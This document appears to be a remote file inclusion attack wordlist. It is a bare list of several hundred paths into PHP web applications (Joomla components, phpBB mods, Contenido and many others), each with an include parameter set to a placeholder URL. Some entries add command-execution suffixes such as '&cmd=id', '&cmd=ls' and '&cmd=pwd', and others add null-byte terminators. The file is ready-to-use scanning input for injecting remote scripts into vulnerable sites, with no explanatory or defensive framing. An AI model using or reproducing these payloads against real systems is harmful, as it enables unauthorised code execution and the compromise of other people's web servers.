-/Administration/Includes/deleteContent.php?path_prefix=XXpathXX
-/Administration/Includes/deleteUser.php?path_prefix=XXpathXX
-/Administration/Includes/userHome.php?path_prefix=XXpathXX
-/Agora_PATH//mdweb/admin/inc/organisations/country_insert.php?chemin_appli=XXpathXX?
-/Agora_PATH//mdweb/admin/inc/organisations/form_org.inc.php?chemin_appli=XXpathXX?
-/BE_config.php?_PSL[classdir]=XXpathXX
-/BPNEWS/bn_smrep1.php?bnrep=XXpathXX?&
-/Base/Application.php?pear_dir=XXpathXX
-/Bcwb_PATH/dcontent/default.css.php?root_path_admin=XXpathXX
-/Bcwb_PATH/include/startup.inc.php?root_path_admin=XXpathXX
-/Bcwb_PATH/system/default.css.php?root_path_admin=XXpathXX
-/Beautifier/Core.php?BEAUT_PATH=XXpathXX?
-/BetaBlockModules//Module/Module.php?path_prefix=XXpathXX
-/BetaBlockModules/AboutUserModule/AboutUserModule.php?path_prefix=XXpathXX
-/BetaBlockModules/AddGroupModule/AddGroupModule.php?path_prefix=XXpathXX
-/BetaBlockModules/AddMessageModule/AddMessageModule.php?path_prefix=XXpathXX
-/BetaBlockModules/AudiosMediaGalleryModule/AudiosMediaGalleryModule.php?current_blockmodule_path=XXpathXX
-/BetaBlockModules/CustomizeUIModule/desktop_image.php?path_prefix=XXpathXX
-/BetaBlockModules/EditProfileModule/DynamicProfile.php?path_prefix=XXpathXX
-/BetaBlockModules/EditProfileModule/external.php?path_prefix=XXpathXX
-/BetaBlockModules/EnableModule/EnableModule.php?path_prefix=XXpathXX
-/BetaBlockModules/ExternalFeedModule/ExternalFeedModule.php?path_prefix=XXpathXX
-/BetaBlockModules/FlickrModule/FlickrModule.php?path_prefix=XXpathXX
-/BetaBlockModules/GroupForumModule/GroupForumModule.php?path_prefix=XXpathXX
-/BetaBlockModules/GroupForumPermalinkModule/GroupForumPermalinkModule.php?path_prefix=XXpathXX
-/BetaBlockModules/GroupModerateContentModule/GroupModerateContentModule.php?path_prefix=XXpathXX
-/BetaBlockModules/GroupModerateUserModule/GroupModerateUserModule.php?path_prefix=XXpathXX
-/BetaBlockModules/GroupModerationModule/GroupModerationModule.php?path_prefix=XXpathXX
-/BetaBlockModules/GroupsCategoryModule/GroupsCategoryModule.php?path_prefix=XXpathXX
-/BetaBlockModules/GroupsDirectoryModule/GroupsDirectoryModule.php?path_prefix=XXpathXX
-/BetaBlockModules/ImagesMediaGalleryModule/ImagesMediaGalleryModule.php?current_blockmodule_path=XXpathXX
-/BetaBlockModules/ImagesModule/ImagesModule.php?path_prefix=XXpathXX
-/BetaBlockModules/InvitationStatusModule/InvitationStatusModule.php?path_prefix=XXpathXX
-/BetaBlockModules/LargestGroupsModule/LargestGroupsModule.php?path_prefix=XXpathXX
-/BetaBlockModules/LinksModule/LinksModule.php?path_prefix=XXpathXX
-/BetaBlockModules/LoginModule/remoteauth_functions.php?path_prefix=XXpathXX
-/BetaBlockModules/LogoModule/LogoModule.php?path_prefix=XXpathXX
-/BetaBlockModules/MediaFullViewModule/MediaFullViewModule.php?path_prefix=XXpathXX
-/BetaBlockModules/MediaManagementModule/MediaManagementModule.php?path_prefix=XXpathXX
-/BetaBlockModules/MembersFacewallModule/MembersFacewallModule.php?current_blockmodule_path=XXpathXX
-/BetaBlockModules/MessageModule/MessageModule.php?path_prefix=XXpathXX
-/BetaBlockModules/ModuleSelectorModule/ModuleSelectorModule.php?path_prefix=XXpathXX
-/BetaBlockModules/MyGroupsModule/MyGroupsModule.php?path_prefix=XXpathXX
-/BetaBlockModules/MyLinksModule/MyLinksModule.php?path_prefix=XXpathXX
-/BetaBlockModules/MyNetworksModule.php?path_prefix=XXpathXX
-/BetaBlockModules/NetworkAnnouncementModule/NetworkAnnouncementModule.php?path_prefix=XXpathXX
-/BetaBlockModules/NetworkDefaultControlModule/NetworkDefaultControlModule.php?path_prefix=XXpathXX
-/BetaBlockModules/NetworkDefaultLinksModule/NetworkDefaultLinksModule.php?path_prefix=XXpathXX
-/BetaBlockModules/NetworkModerateUserModule/NetworkModerateUserModule.php?path_prefix=XXpathXX
-/BetaBlockModules/NetworkResultContentModule/NetworkResultContentModule.php?path_prefix=XXpathXX
-/BetaBlockModules/NetworkResultUserModule/NetworkResultUserModule.php?path_prefix=XXpathXX
-/BetaBlockModules/NetworksDirectoryModule/NetworksDirectoryModule.php?path_prefix=XXpathXX
-/BetaBlockModules/NewestGroupsModule/NewestGroupsModule.php?current_blockmodule_path=XXpathXX
-/BetaBlockModules/PeopleModule/PeopleModule.php?path_prefix=XXpathXX
-/BetaBlockModules/PopularTagsModule/PopularTagsModule.php?path_prefix=XXpathXX
-/BetaBlockModules/PostContentModule/PostContentModule.php?path_prefix=XXpathXX
-/BetaBlockModules/ProfileFeedModule/ProfileFeedModule.php?path_prefix=XXpathXX
-/BetaBlockModules/RecentCommentsModule/RecentCommentsModule.php?path_prefix=XXpathXX
-/BetaBlockModules/RecentPostModule/RecentPostModule.php?path_prefix=XXpathXX
-/BetaBlockModules/RecentTagsModule/RecentTagsModule.php?path_prefix=XXpathXX
-/BetaBlockModules/RegisterModule/RegisterModule.php?path_prefix=XXpathXX
-/BetaBlockModules/SearchGroupsModule/SearchGroupsModule.php?path_prefix=XXpathXX
-/BetaBlockModules/ShowAnnouncementModule/ShowAnnouncementModule.php?path_prefix=XXpathXX
-/BetaBlockModules/ShowContentModule/ShowContentModule.php?path_prefix=XXpathXX
-/BetaBlockModules/TakerATourModule/TakerATourModule.php?path_prefix=XXpathXX
-/BetaBlockModules/UploadMediaModule/UploadMediaModule.php?current_blockmodule_path=XXpathXX
-/BetaBlockModules/UserMessagesModule/UserMessagesModule.php?path_prefix=XXpathXX
-/BetaBlockModules/UserPhotoModule/UserPhotoModule.php?path_prefix=XXpathXX
-/BetaBlockModules/VideosMediaGalleryModule/VideosMediaGalleryModule.php?current_blockmodule_path=XXpathXX
-/BetaBlockModules/ViewAllMembersModule/ViewAllMembersModule.php?path_prefix=XXpathXX
-/Blog_CMS/admin/plugins/NP_UserSharing.php?DIR_ADMIN=XXpathXX?admin
-/BsiliX_path]/files/mbox-action.php3?BSX_LIBDIR=XXpathXX
-/CSLH2_path/txt-db-api/util.php?API_HOME_DIR=XXpathXX?
-/CheckUpload.php?Language=XXpathXX&cmd=ls
-/Contenido_4.8.4/contenido/backend_search.php?contenido_path=XXpathXX?
-/Contenido_4.8.4/contenido/cronjobs/move_articles.php?cfg[path][contenido]=XXpathXX?
-/Contenido_4.8.4/contenido/cronjobs/move_old_stats.php?cfg[path][contenido]=XXpathXX?
-/Contenido_4.8.4/contenido/cronjobs/optimize_database.php?cfg[path][contenido]=XXpathXX?
-/Contenido_4.8.4/contenido/cronjobs/run_newsletter_job.php?cfg[path][contenido]=XXpathXX?
-/Contenido_4.8.4/contenido/cronjobs/send_reminder.php?cfg[path][contenido]=XXpathXX?
-/Contenido_4.8.4/contenido/cronjobs/session_cleanup.php?cfg[path][contenido]=XXpathXX?
-/Contenido_4.8.4/contenido/cronjobs/setfrontenduserstate.php?cfg[path][contenido]=XXpathXX?
-/Contenido_4.8.4/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=XXpathXX?
-/Contenido_4.8.4/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][templates]=XXpathXX?
-/Contenido_4.8.4/contenido/includes/include.newsletter_jobs_subnav.php?cfg[templates][right_top_blank]=XXpathXX?
-/Contenido_4.8.4/contenido/plugins/content_allocation/includes/include.right_top.php?cfg[path][contenido]=XXpathXX?
-/Contenido_4.8.4/contenido/plugins/content_allocation/includes/include.right_top.php?cfg[path][templates]=XXpathXX?
-/Contenido_4.8.4/contenido/plugins/content_allocation/includes/include.right_top.php?cfg[templates][right_top_blank]=XXpathXX?
-/CoupleDB.php?Parametre=0&DataDirectory=XXpathXX?
-/DFF_PHP_FrameworkAPI-latest/include/DFF_affiliate_client_API.php?DFF_config[dir_include]=XXpathXX
-/DFF_PHP_FrameworkAPI-latest/include/DFF_featured_prdt.func.php?DFF_config[dir_include]=XXpathXX
-/DFF_PHP_FrameworkAPI-latest/include/DFF_mer.func.php?DFF_config[dir_include]=XXpathXX
-/DFF_PHP_FrameworkAPI-latest/include/DFF_mer_prdt.func.php?DFF_config[dir_include]=XXpathXX
-/DFF_PHP_FrameworkAPI-latest/include/DFF_paging.func.php?DFF_config[dir_include]=XXpathXX
-/DFF_PHP_FrameworkAPI-latest/include/DFF_rss.func.php?DFF_config[dir_include]=XXpathXX
-/DFF_PHP_FrameworkAPI-latest/include/DFF_sku.func.php?DFF_config[dir_include]=XXpathXX
-/DFF_PHP_FrameworkAPI-latest/include/DFF_sku.func.php?DFF_config[dir_include]XXpathXX
-/DON3/applications/don3_requiem.don3app/don3_requiem.php?app_path=XXpathXX
-/DON3/applications/frontpage.don3app/frontpage.php?app_path=XXpathXX?
-/Dir_phNNTP/article-raw.php?file_newsportal=XXpathXX?
-/DynaTracker_v151/action.php?base_path=XXpathXX
-/DynaTracker_v151/includes_handler.php?base_path=XXpathXX
-/Easysite-2.0_path/configuration/browser.php?EASYSITE_BASE=XXpathXX?
-/Ex/modules/threadstop/threadstop.php?exbb[home_path]=XXpathXX?
-/Ex/modules/threadstop/threadstop.php?new_exbb[home_path]=XXpathXX?
-/Exophpdesk_PATH/pipe.php?lang_file=XXpathXX
-/FirstPost/block.php?Include=XXpathXX
-/Flickrclient.php?path_prefix=XXpathXX
-/FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=XXpathXX?
-/FormTools1_5_0/global/templates/client_page_open.php?g_root_dir=XXpathXX?
-/Full_Release/include/body_comm.inc.php?content=XXpathXX
-/Gallery/displayCategory.php?basepath=XXpathXX
-/Include/lib.inc.php3?Include=XXpathXX?
-/Include/variables.php3?Include=XXpathXX?
-/Jobline/admin.jobline.php?mosConfig_absolute_path=XXpathXX
-/ListRecords.php?lib_dir=XXpathXX?&cmd=id
-/Lorev1/third_party/phpmailer/class.phpmailer.php?lang_path=XXpathXX
-/MOD_forum_fields_parse.php?phpbb_root_path=XXpathXX
-/Mamblog/admin.mamblog.php?cfgfile=XXpathXX
-/Net_DNS_PATH/DNS/RR.php?phpdns_basedir=XXpathXX?
-/NuclearBB/tasks/send_queued_emails.php?root_path=XXpathXX?
-/OpenSiteAdmin/indexFooter.php?path=XXpathXX%00
-/OpenSiteAdmin/pages/pageHeader.php?path=XXpathXX?
-/OpenSiteAdmin/scripts/classes/DatabaseManager.php?path=XXpathXX%00
-/OpenSiteAdmin/scripts/classes/FieldManager.php?path=XXpathXX%00
-/OpenSiteAdmin/scripts/classes/Filter.php?path=XXpathXX%00
-/OpenSiteAdmin/scripts/classes/Filters/SingleFilter.php?path=XXpathXX%00
-/OpenSiteAdmin/scripts/classes/Form.php?path=XXpathXX%00
-/OpenSiteAdmin/scripts/classes/FormManager.php?path=XXpathXX%00
-/OpenSiteAdmin/scripts/classes/LoginManager.php?path=XXpathXX%00
-/PHP/includes/header.inc.php?root=XXpathXX?
-/PHPDJ_v05/dj/djpage.php?page=XXpathXX?
-/PaTh/index.php?rootpath=XXpathXX
-/Path_Script/createurl.php?formurl=XXpathXX
-/PhotoCart/adminprint.php?admin_folder=XXpathXX
-/Picssolution/install/config.php?path=XXpathXX?
-/RGboard/include/footer.php?_path[counter]=XXpathXX?
-/SPIP-v1-7-2/inc-calcul.php3?squelette_cache=XXpathXX?
-/SQuery/lib/gore.php?libpath=XXpathXX
-/SazCart/admin/alayouts/default/pages/login.php?_saz[settings][site_url]=XXpathXX?
-/SazCart/layouts/default/header.saz.php?_saz[settings][site_dir]=XXpathXX?
-/ScriptPage/source/includes/load_forum.php?mfh_root_path=XXpathXX
-/ScriptPath/footers.php?tinybb_footers=XXpathXX
-/ScriptPath/index.php?page=XXpathXX
-/Script_Path/config.inc.php?_path=XXpathXX?
-/Scripts/app_and_readme/navigator/index.php?page=XXpathXX
-/Scripts/mundimail/template/simpledefault/admin/_masterlayout.php?top=XXpathXX
-/Somery/team.php?checkauth=XXpathXX
-/Upload/install.php?skindir=XXpathXX
-/Widgets/Base/Footer.php?sys_dir=XXpathXX
-/Widgets/Base/widget.BifContainer.php?sys_dir=XXpathXX
-/Widgets/Base/widget.BifRoot.php?sys_dir=XXpathXX
-/Widgets/Base/widget.BifRoot2.php?sys_dir=XXpathXX
-/Widgets/Base/widget.BifRoot3.php?sys_dir=XXpathXX
-/Widgets/Base/widget.BifWarning.php?sys_dir=XXpathXX
-/WordPress_Files/All_Users/wp-content/plugins/Enigma2.php?boarddir=XXpathXX?
-/[path]/mybic_server.php?file=XXpathXX
-/[path]/previewtheme.php?theme=1&inc_path=XXpathXX?cmd
-/_administration/securite.php?cfg[document_uri]=XXpathXX
-/_blogadata/include/struct_admin.php?incl_page=XXpathXX?
-/_conf/_php-core/common-tpl-vars.php?admindir=XXpathXX
-/_connect.php?root=XXpathXX
-/_friendly/core/data/_load.php?friendly_path=XXpathXX
-/_friendly/core/data/yaml.inc.php?friendly_path=XXpathXX
-/_friendly/core/display/_load.php?friendly_path=XXpathXX
-/_friendly/core/support/_load.php?friendly_path=XXpathXX
-/_functions.php?prefix=XXpathXX
-/_includes/settings.inc.php?approot=XXpathXX
-/_theme/breadcrumb.php?rootBase=XXpathXX
-/_wk/wk_lang.php?WK[wkPath]=XXpathXX
-/abf_js.php?abs_pfad=XXpathXX?&cmd=id
-/about.php?CONFIG[MWCHAT_Libs]=XXpathXX?
-/about.php?bibtexrootrel=XXpathXX?
-/aboutinfo.php?bibtexrootrel=XXpathXX?
-/acc.php?page=XXpathXX
-/access/login.php?path_to_root=XXpathXX
-/account.php?insPath=XXpathXX
-/accsess/login.php?path_to_root=XXpathXX
-/active/components/xmlrpc/client.php?c[components]=XXpathXX
-/ad_main.php?_mygamefile=XXpathXX
-/add.cgi.php?blog_theme=XXpathXX
-/add_link.php?blog_theme=XXpathXX
-/addpost_newpoll.php?addpoll=preview&thispath=XXpathXX
-/addressbook.php?GLOBALS[basedir]=XXpathXX?
-/addsite.php?returnpath=XXpathXX
-/addvip.php?msetstr["PROGSDIR"]=XXpathXX
-/adm/krgourl.php?DOCUMENT_ROOT=XXpathXX?
-/adm/my_statistics.php?DOCUMENT_ROOT=XXpathXX?
-/admin.loudmouth.php?mainframe=XXpathXX
-/admin.php?Madoa=XXpathXX?
-/admin.php?cal_dir=XXpathXX
-/admin.php?env_dir=XXpathXX
-/admin.php?lang=XXpathXX
-/admin.php?page[path]=XXpathXX?&cmd=ls
-/admin.php?submit=submit&form_include_template=XXpathXX
-/admin/PLUGINs/NP_UserSharing.php?DIR_ADMIN=XXpathXX?admin
-/admin/ST_countries.php?include_path=XXpathXX?
-/admin/ST_platforms.php?include_path=XXpathXX?
-/admin/addentry.php?phpbb_root_path=XXpathXX?
-/admin/addons/archive/archive.php?adminfolder=XXpathXX
-/admin/admin.php?path=XXpathXX
-/admin/admin.php?site_url=XXpathXX
-/admin/admin_forgotten_password.php?root_folder_path=XXpathXX
-/admin/admin_news_bot.php?root_path=XXpathXX?
-/admin/admin_topic_action_logging.php?setmodules=attach&phpbb_root_path=XXpathXX
-/admin/admin_topic_action_logging.php?setmodules=pagestart&phpbb_root_path=XXpathXX
-/admin/admin_users.php?phpbb_root_path=XXpathXX
-/admin/auth.php?xcart_dir=XXpathXX?
-/admin/auth/secure.php?cfgProgDir=XXpathXX?
-/admin/autoprompter.php?CONFIG[BASE_PATH]=XXpathXX
-/admin/bin/patch.php?INSTALL_FOLDER=XXpathXX
-/admin/catagory.php?language=XXpathXX
-/admin/classes/pear/OLE/PPS.php?homedir=XXpathXX
-/admin/classes/pear/OLE/PPS/File.php?homedir=XXpathXX
-/admin/classes/pear/OLE/PPS/Root.php?homedir=XXpathXX
-/admin/classes/pear/Spreadsheet/Excel/Writer.php?homedir=XXpathXX
-/admin/classes/pear/Spreadsheet/Excel/Writer/BIFFwriter.php?homedir=XXpathXX
-/admin/classes/pear/Spreadsheet/Excel/Writer/Format.php?homedir=XXpathXX
-/admin/classes/pear/Spreadsheet/Excel/Writer/Parser.php?homedir=XXpathXX
-/admin/classes/pear/Spreadsheet/Excel/Writer/Workbook.php?homedir=XXpathXX
-/admin/classes/pear/Spreadsheet/Excel/Writer/Worksheet.php?homedir=XXpathXX
-/admin/code/index.php?load_page=XXpathXX
-/admin/comment.php?config[installdir]=XXpathXX
-/admin/common-menu.php?CONF[local_path]=XXpathXX
-/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=XXpathXX?
-/admin/config_settings.tpl.php?include_path=XXpathXX?&cmd=id
-/admin/directory.php?config[installdir]=XXpathXX
-/admin/doeditconfig.php?thispath=../includes&config[path]=XXpathXX
-/admin/frontpage_right.php?loadadminpage=XXpathXX
-/admin/header.php?loc=XXpathXX
-/admin/inc/add.php?format_menue=XXpathXX
-/admin/inc/change_action.php?format_menue=XXpathXX
-/admin/include/common.php?commonIncludePath=XXpathXX?
-/admin/include/header.php?repertoire=XXpathXX?
-/admin/include/lib.module.php?mod_root=XXpathXX
-/admin/includes/admin_header.php?level=XXpathXX?
-/admin/includes/author_panel_header.php?level=XXpathXX?
-/admin/includes/header.php?bypass_installed=1&secure_page_path=XXpathXX%00
-/admin/includes/spaw/spaw_control.class.php?spaw_root=XXpathXX?
-/admin/index.php?path_to_script=XXpathXX?&cmd=ls
-/admin/index.php?pg=XXpathXX?
-/admin/index.php?xtrphome=XXpathXX
-/admin/index_sitios.php?_VIEW=XXpathXX
-/admin/lib_action_step.php?GLOBALS[CLASS_PATH]=XXpathXX
-/admin/login.php?absolute_path=XXpathXX
-/admin/news.admin.php?path_to_script=XXpathXX?&cmd=ls
-/admin/news.php?language=XXpathXX
-/admin/plugins/Online_Users/main.php?GLOBALS[PT_Config][dir][data]=XXpathXX
-/admin/sendmsg.php?config[installdir]=XXpathXX
-/admin/setup/level2.php?dir=XXpathXX
-/admin/system/config/conf-activation.php?site_path=XXpathXX
-/admin/system/include.php?skindir=XXpathXX
-/admin/system/include.php?start=1&skindir=XXpathXX
-/admin/system/menu/item.php?site_path=XXpathXX
-/admin/system/modules/conf_modules.php?site_path=XXpathXX
-/admin/templates/template_thumbnail.php?thumb_template=XXpathXX
-/admin/testing/tests/0004_init_urls.php?init_path=XXpathXX?&
-/admin/themes.php?config[installdir]=XXpathXX
-/admin/tools/utf8conversion/index.php?path=XXpathXX?
-/admin/user_user.php?language=XXpathXX
-/admincp/auth/checklogin.php?cfgProgDir=XXpathXX
-/admincp/auth/secure.php?cfgProgDir=XXpathXX
-/adminhead.php?path[docroot]=XXpathXX
-/admini/admin.php?INC=XXpathXX?
-/admini/index.php?INC=XXpathXX?
-/administrator/admin.php?site_absolute_path=XXpathXX?
-/administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=XXpathXX
-/administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=XXpathXX?
-/administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=XXpathXX?
-/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=XXpathXX?
-/administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=XXpathXX?
-/administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=XXpathXX?
-/administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php?mosConfig_absolute_path=XXpathXX?
-/administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=XXpathXX?
-/administrator/components/com_clickheat/Recly/Clickheat/Cache.php?GLOBALS[mosConfig_absolute_path]=XXpathXX
-/administrator/components/com_clickheat/Recly/Clickheat/Clickheat_Heatmap.php?GLOBALS[mosConfig_absolute_path]=XXpathXX
-/administrator/components/com_clickheat/Recly/common/GlobalVariables.php?GLOBALS[mosConfig_absolute_path]=XXpathXX
-/administrator/components/com_clickheat/includes/heatmap/_main.php?mosConfig_absolute_path=XXpathXX
-/administrator/components/com_clickheat/includes/heatmap/main.php?mosConfig_absolute_path=XXpathXX
-/administrator/components/com_clickheat/includes/overview/main.php?mosConfig_absolute_path=XXpathXX
-/administrator/components/com_clickheat/install.clickheat.php?GLOBALS[mosConfig_absolute_path]=XXpathXX
-/administrator/components/com_color/admin.color.php?mosConfig_live_site=XXpathXX?
-/administrator/components/com_competitions/includes/competitions/add.php?GLOBALS[mosConfig_absolute_path]=XXpathXX
-/administrator/components/com_competitions/includes/competitions/competitions.php?GLOBALS[mosConfig_absolute_path]=XXpathXX
-/administrator/components/com_competitions/includes/settings/settings.php?mosConfig_absolute_path=XXpathXX
-/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=XXpathXX?
-/administrator/components/com_dadamail/config.dadamail.php?GLOBALS[mosConfig_absolute_path]=XXpathXX
-/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=XXpathXX
-/administrator/components/com_events/admin.events.php?mosConfig_absolute_path=XXpathXX
-/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=XXpathXX
-/administrator/components/com_extended_registration/admin.extended_registration.php?mosConfig_absolute_path=XXpathXX?
-/administrator/components/com_feederator/includes/tmsp/add_tmsp.php?mosConfig_absolute_path=XXpathXX
-/administrator/components/com_feederator/includes/tmsp/edit_tmsp.php?mosConfig_absolute_path=XXpathXX
-/administrator/components/com_feederator/includes/tmsp/subscription.php?GLOBALS[mosConfig_absolute_path]=XXpathXX
-/administrator/components/com_feederator/includes/tmsp/tmsp.php?mosConfig_absolute_path=XXpathXX
-/administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=XXpathXX
-/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=XXpathXX
-/administrator/components/com_jcs/view/add.php?mosConfig_absolute_path=XXpathXX
-/administrator/components/com_jcs/view/history.php?mosConfig_absolute_path=XXpathXX
-/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=XXpathXX
-/administrator/components/com_jcs/views/list.sub.html.php?mosConfig_absolute_path=XXpathXX
-/administrator/components/com_jcs/views/list.user.sub.html.php?mosConfig_absolute_path=XXpathXX
-/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=XXpathXX
-/administrator/components/com_jim/install.jim.php?mosConfig_absolute_path=XXpathXX?
-/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=XXpathXX?
-/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=XXpathXX
-/administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=XXpathXX
-/administrator/components/com_joomla_flash_uploader/uninstall.joomla_flash_uploader.php?mosConfig_absolute_path=XXpathXX
-/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=XXpathXX
-/administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=XXpathXX?
-/administrator/components/com_jreactions/langset.php?comPath=XXpathXX?
-/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=XXpathXX
-/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=XXpathXX?
-/administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=XXpathXX?
-/administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=XXpathXX?
-/administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=XXpathXX
-/administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=XXpathXX
-/administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=XXpathXX
-/administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=XXpathXX
-/administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=XXpathXX
-/administrator/components/com_mosmedia/includes/support.html.php?mosConfig_absolute_path=XXpathXX
-/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=XXpathXX
-/administrator/components/com_nfn_addressbook/nfnaddressbook.php?mosConfig_absolute_path=XXpathXX?
-/administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=XXpathXX
-/administrator/components/com_panoramic/admin.panoramic.php?mosConfig_live_site=XXpathXX
-/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=XXpathXX
-/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=XXpathXX
-/administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=XXpathXX
-/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=XXpathXX?
-/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=XXpathXX?
-/administrator/components/com_tour_toto/admin.tour_toto.php?mosConfig_absolute_path=XXpathXX?
-/administrator/components/com_treeg/admin.treeg.php?mosConfig_live_site=XXpathXX
-/administrator/components/com_webring/admin.webring.docs.php?component_dir=XXpathXX?
-/administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=XXpathXX
-/administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=XXpathXX
-/administrator/components/com_wmtrssreader/admin.wmtrssreader.php?mosConfig_live_site=XXpathXX?
-/administrator/menu_add.php?site_absolute_path=XXpathXX?
-/administrator/menu_operation.php?site_absolute_path=XXpathXX?
-/adminpanel/includes/add_forms/addmp3.php?GLOBALS[root_path]=XXpathXX
-/adminpanel/includes/mailinglist/mlist_xls.php?GLOBALS[root_path]=XXpathXX?
-/adodb/adodb-errorpear.inc.php?ourlinux_root_path=XXpathXX
-/adodb/adodb-pear.inc.php?ourlinux_root_path=XXpathXX
-/adodb/adodb.inc.php?path=XXpathXX
-/advanced_comment_system/admin.php?ACS_path=XXpathXX?
-/advanced_comment_system/index.php?ACS_path=XXpathXX?
-/afb-3-beta-2007-08-28/_includes/settings.inc.php?approot=XXpathXX?
-/agenda.php3?rootagenda=XXpathXX
-/agenda2.php3?rootagenda=XXpathXX
-/aides/index.php?page=XXpathXX?
-/ains_main.php?ains_path=XXpathXX
-/ajax/loadsplash.php?full_path=XXpathXX
-/ajouter.php?include=XXpathXX?
-/akarru.gui/main_content.php?bm_content=XXpathXX
-/akocomments.php?mosConfig_absolute_path=XXpathXX
-/amazon/cart.php?cmd=add&asin=XXpathXX
-/amazon/index.php?lang=XXpathXX
-/amazon/info.php?asin=XXpathXX
-/annonce.php?page=XXpathXX?&cmd=id
-/announcements.php?phpraid_dir=XXpathXX
-/anzagien.php?config[root_ordner]=XXpathXX?cmd=id
-/apbn/templates/head.php?APB_SETTINGS[template_path]=XXpathXX
-/api.php?t_path_core=XXpathXX?&cmd=id
-/apps/apps.php?app=XXpathXX
-/appserv/main.php?appserv_root=XXpathXX
-/arab3upload/customize.php?path=XXpathXX?&cmd=pwd
-/arab3upload/initialize.php?path=XXpathXX?&cmd=pwd
-/arash_lib/class/arash_gadmin.class.php?arashlib_dir=XXpathXX
-/arash_lib/class/arash_sadmin.class.php?arashlib_dir=XXpathXX
-/arash_lib/include/edit.inc.php?arashlib_dir=XXpathXX
-/arash_lib/include/list_features.inc.php?arashlib_dir=XXpathXX
-/archive.php?scriptpath=XXpathXX?
-/aroundme/template/barnraiser_01/pol_view.tpl.php?poll=1&templatePath=XXpathXX%00
-/artlist.php?root_path=XXpathXX
-/assets/plugins/mp3_id/mp3_id.php?GLOBALS[BASE]=XXpathXX?cmd
-/assets/snippets/reflect/snippet.reflect.php?reflect_base=XXpathXX?
-/athena.php?athena_dir=XXpathXX
-/auction/auction_common.php?phpbb_root_path=XXpathXX
-/auction/includes/converter.inc.php?include_path=XXpathXX?
-/auction/includes/messages.inc.php?include_path=XXpathXX?
-/auction/includes/settings.inc.php?include_path=XXpathXX?
-/auction/phpAdsNew/view.inc.php?phpAds_path=XXpathXX
-/auth.cookie.inc.php?da_path=XXpathXX
-/auth.header.inc.php?da_path=XXpathXX
-/auth.sessions.inc.php?da_path=XXpathXX
-/auth/auth.php?phpbb_root_path=XXpathXX
-/auth/auth_phpbb/phpbb_root_path=XXpathXX
-/authenticate.php?default_path_for_themes=XXpathXX?
-/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=XXpathXX
-/authentication/smf/smf.functions.php?pConfig_auth[smf_path]=XXpathXX
-/auto_check_renewals.php?installed_config_file=XXpathXX?cmd=ls
-/autoindex.php?cfg_file=XXpathXX?
-/awzmb/adminhelp.php?Setting[OPT_includepath]=XXpathXX
-/awzmb/modules/admin.incl.php?Setting[OPT_includepath]=XXpathXX
-/awzmb/modules/core/core.incl.php?Setting[OPT_includepath]=XXpathXX
-/awzmb/modules/gbook.incl.php?Setting[OPT_includepath]=XXpathXX
-/awzmb/modules/help.incl.php?Setting[OPT_includepath]=XXpathXX
-/awzmb/modules/reg.incl.php?Setting[OPT_includepath]=XXpathXX
-/axoverzicht.cgi?maand=XXpathXX
-/b2-tools/gm-2-b2.php?b2inc=XXpathXX
-/b2verifauth.php?index=XXpathXX?
-/backend/addons/links/index.php?PATH=XXpathXX
-/basebuilder/src/main.inc.php?mj_config[src_path]=XXpathXX???
-/bb_admin.php?includeFooter=XXpathXX
-/beacon/language/1/splash.lang.php?languagePath=XXpathXX
-/beacon/language/1/splash.lang.php?languagePath=XXpathXX?
-/belegungsplan/jahresuebersicht.inc.php?root=XXpathXX
-/belegungsplan/monatsuebersicht.inc.php?root=XXpathXX
-/belegungsplan/tagesuebersicht.inc.php?root=XXpathXX
-/belegungsplan/wochenuebersicht.inc.php?root=XXpathXX
-/bemarket/postscript/postscript.php?p_mode=XXpathXX
-/biblioteca/bib_form.php?CLASSPATH=XXpathXX
